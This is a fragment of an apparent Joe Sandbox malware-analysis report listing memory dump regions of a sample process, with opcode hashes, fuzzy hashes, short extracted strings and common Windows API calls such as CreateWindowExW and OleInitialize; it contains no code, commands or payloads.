                                                            • Opcode Fuzzy Hash: c540f65aae93274e3c5d7f6668f36c31bef7bc2ef79646675df4cc0aca1edbc0
                                                            • Instruction Fuzzy Hash: 11126D30A022499FCB15CF68D984AAEBBF2FF48314F1485A9E856DB761DB30ED45CB50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Hbq$Hbq
                                                            • API String ID: 0-4258043069
                                                            • Opcode ID: ea3c3a86e7e0134b45e38ff204d299857355245233db5884f0b796155a27b405
                                                            • Instruction ID: c4f487c99479dd42352b580ea475e8056d39c715d02c86acfeac04500038b8ab
                                                            • Opcode Fuzzy Hash: ea3c3a86e7e0134b45e38ff204d299857355245233db5884f0b796155a27b405
                                                            • Instruction Fuzzy Hash: 8D919C343062558FDB169F38D858A6E7BA6BFA8300F14846AE806CB791DF34CC42DB91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,bq$,bq
                                                            • API String ID: 0-2699258169
                                                            • Opcode ID: d445adaf79c4c1f7b219c3b11ad957ae4f34764dc4fe23101e41d3df39abd77c
                                                            • Instruction ID: 077952f05306ea82bd2a4b9ee5ec35af1de14c25aab11e0f8b82801c9f6552ad
                                                            • Opcode Fuzzy Hash: d445adaf79c4c1f7b219c3b11ad957ae4f34764dc4fe23101e41d3df39abd77c
                                                            • Instruction Fuzzy Hash: 7781B030B17505CFCB14CF69E888969BBF2BF9A310B158169D406EB765DB31EC82CB52
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q
                                                            • API String ID: 0-2697143702
                                                            • Opcode ID: 97711fdbdebeac29f7313423fdf83bd73cfbbfee1986dcd9ed3c7af2de761475
                                                            • Instruction ID: cf55b9d20aff3e4dc684f1503cb12b07eb76981d8f4c370ac7016ae273fc8391
                                                            • Opcode Fuzzy Hash: 97711fdbdebeac29f7313423fdf83bd73cfbbfee1986dcd9ed3c7af2de761475
                                                            • Instruction Fuzzy Hash: F3518D347022189FDB01DB69C844B7A7BABFF89310F148466E909CB355EB71CC42CBA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Xbq$Xbq
                                                            • API String ID: 0-1243427068
                                                            • Opcode ID: 788e897e511bcf9d788c461bba58f263bd09b4492a441a9f16882f5e1945de58
                                                            • Instruction ID: 52ac30c3ed1b83e3d18df743330e0bce6ee88a7dc94ec835a74de2e043f1589b
                                                            • Opcode Fuzzy Hash: 788e897e511bcf9d788c461bba58f263bd09b4492a441a9f16882f5e1945de58
                                                            • Instruction Fuzzy Hash: BC31E73570B3648BDF28867A599827EAAE7BBC4200F18483EE807D3794DB75DC45C761
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $^q$$^q
                                                            • API String ID: 0-355816377
                                                            • Opcode ID: 41cd9494b60a2115e7484e7677720cb35e89954107dca6155dc97144fad8e267
                                                            • Instruction ID: 1443289423c02143e5667e973a31cf78ef97d826ea4ffca52aa10f109159d831
                                                            • Opcode Fuzzy Hash: 41cd9494b60a2115e7484e7677720cb35e89954107dca6155dc97144fad8e267
                                                            • Instruction Fuzzy Hash: 7A31C2313172114FCB268B298894A3E7B67BB85780B24849AF012DB793EF28DC81C755
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LR^q
                                                            • API String ID: 0-2625958711
                                                            • Opcode ID: 75722f1f48b74824c6ec0a86bdc1e1717e95eb511cbb1d5a4d8b3a8b031c3aa0
                                                            • Instruction ID: 90e58cfb07e80d2245b99765a1c03e1821303d46acef80bd19318c8739c3ec88
                                                            • Opcode Fuzzy Hash: 75722f1f48b74824c6ec0a86bdc1e1717e95eb511cbb1d5a4d8b3a8b031c3aa0
                                                            • Instruction Fuzzy Hash: C152D974A01219CFCB54DF68E99CA9DBBF2FB48301F1082A6D409A7365DB346E85CF91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LR^q
                                                            • API String ID: 0-2625958711
                                                            • Opcode ID: 3d84539d311c40b4647ec0decd584dde2b44eb0903534ea0ca8f5af7817e6b7c
                                                            • Instruction ID: d996645649e25594ac63d26ddb72d6350aa1468d768783922b8af19af3cdc5db
                                                            • Opcode Fuzzy Hash: 3d84539d311c40b4647ec0decd584dde2b44eb0903534ea0ca8f5af7817e6b7c
                                                            • Instruction Fuzzy Hash: 2B52C974A00219CFCB54DF68E998A9DBBF2FB48301F1082A6D509A7365DB346E85CF91
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 3f00a7d79eab039142d3ac9810d1013edf5c325d6b4d03289bf26a1835f64162
                                                            • Instruction ID: a9c1e56b9d0e60d13c0957a4993fb1be341a4f5599a54a41653ffe6ceb873e73
                                                            • Opcode Fuzzy Hash: 3f00a7d79eab039142d3ac9810d1013edf5c325d6b4d03289bf26a1835f64162
                                                            • Instruction Fuzzy Hash: 4C713270A01B058FDB24DF69D95875ABBF1BF88304F008A2AE48AD7B50DB74E945CB91
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 016E74A2
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 8bb2b31c59d0e7cd22350f3b7efbb1b67ca479b13230ed6557c228d88d7e88be
                                                            • Instruction ID: 22e607214708b9bf432f62ba53a4753f98314ffc4ae22e8a6ec9fcb9288628f3
                                                            • Opcode Fuzzy Hash: 8bb2b31c59d0e7cd22350f3b7efbb1b67ca479b13230ed6557c228d88d7e88be
                                                            • Instruction Fuzzy Hash: BE51D0B1D01349DFDB14CFA9D884ADEBFB5BF48310F24822AE819AB210D771A841CF91
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 016E74A2
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 9bc3f7c32f7580caeb97011a50eaef3f7aa589f204bca2a50e65d3a60e1ab4d0
                                                            • Instruction ID: 3ad779a97a31929291b55c49f89398456bc3b097012dd26dffc2882d5431324c
                                                            • Opcode Fuzzy Hash: 9bc3f7c32f7580caeb97011a50eaef3f7aa589f204bca2a50e65d3a60e1ab4d0
                                                            • Instruction Fuzzy Hash: 9251BFB1D01309DFDB14CFAAD984ADEBFB5BF48310F24822AE819AB210D7749845CF91
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 016E9B91
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 27f0926014c9c8389ac195160a796640e24b4e05cf3e50357629ad7faf18f618
                                                            • Instruction ID: 55fad7d2125a7f8027ff39eeed8d26c5ead804e5cfdd4e79b688e3835c2e537d
                                                            • Opcode Fuzzy Hash: 27f0926014c9c8389ac195160a796640e24b4e05cf3e50357629ad7faf18f618
                                                            • Instruction Fuzzy Hash: D841F8B49002499FCB14CF99C888AABBBF5FF89318F15C559E519AB321D774A841CFA0
                                                            APIs
                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 06F29A6E
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4139419804.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_6f20000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 2c67c0f9b6eb2fdb468f7ebb5ee60f3eedde7b45e54e86a9cebc562d190a02fc
                                                            • Instruction ID: 91ceebe061afe4c3893be91086aabc025138cd6d89e31ffdc760c432792ea43c
                                                            • Opcode Fuzzy Hash: 2c67c0f9b6eb2fdb468f7ebb5ee60f3eedde7b45e54e86a9cebc562d190a02fc
                                                            • Instruction Fuzzy Hash: B6117C75E0121A9FDB44CFEAD884AADBBB5FF88314F148169E804E7245DBB0A941CF50
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,016E51CC), ref: 016E5406
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 383f9d846a4d79976b6f6aac7f7803c46a0eaaee8f75703fe08b99be6f866974
                                                            • Instruction ID: 0baf02cd2efde2324169f7a11f4317baee592b18de6e981341283594e4145f4e
                                                            • Opcode Fuzzy Hash: 383f9d846a4d79976b6f6aac7f7803c46a0eaaee8f75703fe08b99be6f866974
                                                            • Instruction Fuzzy Hash: C21120B5D01348CFCB10CF9AC848A9EFBF4EB88314F10812AD919A7200D375A545CFA5
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 016EC06D
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 718372f663456713155913087613e61748d7d0f4c442e5a4abca0e20a238df18
                                                            • Instruction ID: 7ac58b285e9380cae07e4fd889b032aeae4739b6aa19e1bc1f2bfc8158912f00
                                                            • Opcode Fuzzy Hash: 718372f663456713155913087613e61748d7d0f4c442e5a4abca0e20a238df18
                                                            • Instruction Fuzzy Hash: E31103B19007488FCB20DF9AD548B9EBFF4EB48324F108559D519A7310C375A944CFA5
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 016EC06D
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121547610.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_16e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 16e48a194c7aa5486574981da1da5ef2b4bee55ef09d62a4267e5047e1b00395
                                                            • Instruction ID: 2ec45e96b0ff6f87e8d3695b5af53580bd57fa29757418c827d2d82b1585df2e
                                                            • Opcode Fuzzy Hash: 16e48a194c7aa5486574981da1da5ef2b4bee55ef09d62a4267e5047e1b00395
                                                            • Instruction Fuzzy Hash: 981103B58007488FDB20DFAAD549BDEFFF4EB48320F10855AD519A7610C375A984CFA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o^q
                                                            • API String ID: 0-74704288
                                                            • Opcode ID: 5dd9ad82489dbeef4b9336f9388a5cf5fa3fad6dad8b0344b713983fd6678efc
                                                            • Instruction ID: ac090d5000c74e3273f56bdc011f71343a3372820d6ce40ede5e96a967b099c5
                                                            • Opcode Fuzzy Hash: 5dd9ad82489dbeef4b9336f9388a5cf5fa3fad6dad8b0344b713983fd6678efc
                                                            • Instruction Fuzzy Hash: D1618175B012059FCB05DF68C898AAEBBB6FF88750B148569E916D73A0DF31ED01CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o^q
                                                            • API String ID: 0-74704288
                                                            • Opcode ID: 6b5c9077b1fd358cae275b62887127c4224784f50f5854e08cc9a5d92f561cee
                                                            • Instruction ID: 871d331c490321f11f3c72dba912b9eef4ffddc5beb97af59077ec5735470663
                                                            • Opcode Fuzzy Hash: 6b5c9077b1fd358cae275b62887127c4224784f50f5854e08cc9a5d92f561cee
                                                            • Instruction Fuzzy Hash: 3841BE70606289DFCB16CF68C844B6EBBF6FB44300F04846AE8158B752DB75DD45CBA1
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f358b5c6d4eb3775e7bed40e18972bba829aee1868639b562e38f50a9d93419d
                                                            • Instruction ID: 7684188dac3623113cb73b93cc82c2672e0234d01945fb4f2c689e3da00b5eb3
                                                            • Opcode Fuzzy Hash: f358b5c6d4eb3775e7bed40e18972bba829aee1868639b562e38f50a9d93419d
                                                            • Instruction Fuzzy Hash: D11295780312528FA7512F34A6AE53EBF69FB4F363705EC52F95A806559F300488EF22
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ecdf920734fef55147e6aa27e625fc6ef681461f7634c51d8966b4ca04cf3d43
                                                            • Instruction ID: 430eb5d910391e299ffc4d5517fd7625623eaa23954e57101323588a4b5f01a3
                                                            • Opcode Fuzzy Hash: ecdf920734fef55147e6aa27e625fc6ef681461f7634c51d8966b4ca04cf3d43
                                                            • Instruction Fuzzy Hash: 751283781312528FA7502F24A6AE53EBF69FB4F363705FC52F95A806559F300588EF22
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a97a7064ad680aa04168cdcd7e06b1baab41b8ecc7743431059c06bc63f1f3d6
                                                            • Instruction ID: afba59dfdec9d9078b62a9744367adb7ad7af2164dbaddeebac5a298831fbee8
                                                            • Opcode Fuzzy Hash: a97a7064ad680aa04168cdcd7e06b1baab41b8ecc7743431059c06bc63f1f3d6
                                                            • Instruction Fuzzy Hash: 51423174A00218CFEB549BA8C890B9EBB77FF94340F1081A9C50A6B3A5DF355E85EF51
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d503e08d5735a1d050649bcf8e6342504c3c59bdcaa8e2d0199272c317730062
                                                            • Instruction ID: c9dbeee84af19e2ff70c853b1c4b17a37e9776d4b5111979649c80d2c133d38d
                                                            • Opcode Fuzzy Hash: d503e08d5735a1d050649bcf8e6342504c3c59bdcaa8e2d0199272c317730062
                                                            • Instruction Fuzzy Hash: 13423174A00219CFEB549BA8C890B9EBB77FF94340F1081A9C50A6B3A4DF355E85EF51
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 38ba84cf0dfebb42ce7eeea020f29be79f0dc11dd228435cbd6a474f7382165f
                                                            • Instruction ID: 38f58d3f8f5e2e4d812f1e7aaf6aa2538b24fcddd71e38ccd2acb2452f74727d
                                                            • Opcode Fuzzy Hash: 38ba84cf0dfebb42ce7eeea020f29be79f0dc11dd228435cbd6a474f7382165f
                                                            • Instruction Fuzzy Hash: 59917931A076059FC711CF6CC8849AABBB6FF85364B14C6A6D828D7751DB31F911CBA0
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e7ca26caca6e2175454c2dcc325ce5f1245dad65883f33b7e0ce4098b20257d
                                                            • Instruction ID: d14961dc27a7acff6b3ab538f059cca3d7c939a717a30b25ef0343d61ba5631d
                                                            • Opcode Fuzzy Hash: 0e7ca26caca6e2175454c2dcc325ce5f1245dad65883f33b7e0ce4098b20257d
                                                            • Instruction Fuzzy Hash: F4715E347066058FCB25DF68C894AAE7BE6BF89205F1540A9E806DB7B1DB70DC41CB91
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 376cd2a380efa45c046edfdcc0294f3d90cf90342f5c03289480d3647ef44212
                                                            • Instruction ID: 8facaf6dd982cd4fd8b46e4f631b55b3e4060bef1c664486935468d14f887608
                                                            • Opcode Fuzzy Hash: 376cd2a380efa45c046edfdcc0294f3d90cf90342f5c03289480d3647ef44212
                                                            • Instruction Fuzzy Hash: C7610434E01219DFDB14DFA5D988AADBBB2FF88304F208529E809BB394DB355946CF41
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 489da0fa78524e3c5abe44494f957ff137ed147405055736afb61aa8442ad873
                                                            • Instruction ID: 7ff43f730a57f0f7cfe87188a6467705c7603dac14a1c44c3b71d0476e301bbb
                                                            • Opcode Fuzzy Hash: 489da0fa78524e3c5abe44494f957ff137ed147405055736afb61aa8442ad873
                                                            • Instruction Fuzzy Hash: 6E519474E01218DFDB58DFA9D58499DBBF2FF89300F208169E819AB365DB30A905CF50
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dc934d33fa7187710caf97a3cf7a9ce8669c8a56421875813eefac169548f45b
                                                            • Instruction ID: ffeca9bf0944fe289651936145a076a614fe1bbab7fe2a01b1add33a759bfe61
                                                            • Opcode Fuzzy Hash: dc934d33fa7187710caf97a3cf7a9ce8669c8a56421875813eefac169548f45b
                                                            • Instruction Fuzzy Hash: 2651A874E01208CFCB08DFA9D59499DBBF2FF89304B209069E815AB365DB35AD42CF50
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f58e4019cea5c91c34a038fa6672a21b8498b4f84fd2a340ffab59efa75b916e
                                                            • Instruction ID: 1f62e19f2324e7387fd87f5205cd9ee03975713466c31db89f25c9b629124de0
                                                            • Opcode Fuzzy Hash: f58e4019cea5c91c34a038fa6672a21b8498b4f84fd2a340ffab59efa75b916e
                                                            • Instruction Fuzzy Hash: F9417D31A06259DFCF11CFE8C848AAEBBB2BF89310F048556E919AB791D734ED14CB50
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08da6b821156d1bcdb871d9af25d316feb1698f5e6e149383e90353bdc73722f
                                                            • Instruction ID: 6137c46b6ab12fc9b9661c73189f5165838b5eae184d323bea2ddf34bf776fd6
                                                            • Opcode Fuzzy Hash: 08da6b821156d1bcdb871d9af25d316feb1698f5e6e149383e90353bdc73722f
                                                            • Instruction Fuzzy Hash: 4A315C352062199FCF019F68D884ABE3FA2FB68344F008425F91A8B354CB35CE61EF91
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4e9fd2e59483ac69f9bc182474b4f94aaa7f9541b2a94c4b1f1a562d858d15d
                                                            • Instruction ID: ecb0c4e684248423df6b8a26dc5409b2a71d2d6f5a015bcfc279fbf4f30dcd19
                                                            • Opcode Fuzzy Hash: b4e9fd2e59483ac69f9bc182474b4f94aaa7f9541b2a94c4b1f1a562d858d15d
                                                            • Instruction Fuzzy Hash: CD210731307215CBCB155B798854A3E3A97FFC5748708827AD906CBBA5EE26CC43E782
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 440938579789c58b077e3467b629c6e491ad00c998a45897d0531a46aeba386e
                                                            • Instruction ID: f8b94cc2bf3199e15bec9e3df445551362c0ea47677592d70215a60c177a0039
                                                            • Opcode Fuzzy Hash: 440938579789c58b077e3467b629c6e491ad00c998a45897d0531a46aeba386e
                                                            • Instruction Fuzzy Hash: CE315C74D4A2098FCB45DFA8E4546EEBFFAFB4A300F10416AD805A7265EB304A55CBA1
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89703dfed06fd5b0f549dec40ab83c5aa42736d0cdfdc761b756534e04731f30
                                                            • Instruction ID: e80300188a17f2b599a7819226aabd53ff35b10dde250e23293399748ff0be08
                                                            • Opcode Fuzzy Hash: 89703dfed06fd5b0f549dec40ab83c5aa42736d0cdfdc761b756534e04731f30
                                                            • Instruction Fuzzy Hash: 0C21CF313072118BDB159A69C454A3E669BFFC4748F148239E906CBB98EE76CC43E782
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb433108e5e5367f1808465365dadc537f489d075a5a7b3f7c65068abb47ac00
                                                            • Instruction ID: 643ce0dcd2c77932139ffdbea84a0562d1daa97c6f970611cdea6f5fb3867640
                                                            • Opcode Fuzzy Hash: eb433108e5e5367f1808465365dadc537f489d075a5a7b3f7c65068abb47ac00
                                                            • Instruction Fuzzy Hash: B821D4357065218FC7158A29E49893EBBA2FFE9751704856AE80BCB794CF31DC02CB91
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97bd525bb06d78df71324d1625bb031171431a4fd1113f214934b3cd11a910b1
                                                            • Instruction ID: 06cdd1c958561a7b7023c414b4e605582de9bb2771891d99a687a245738c1220
                                                            • Opcode Fuzzy Hash: 97bd525bb06d78df71324d1625bb031171431a4fd1113f214934b3cd11a910b1
                                                            • Instruction Fuzzy Hash: 8521A175A011059FCB14DF34D4509AE37AAFB9D664B50C059D84A9B380DA34EE43CBE2
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121852365.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_185d000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
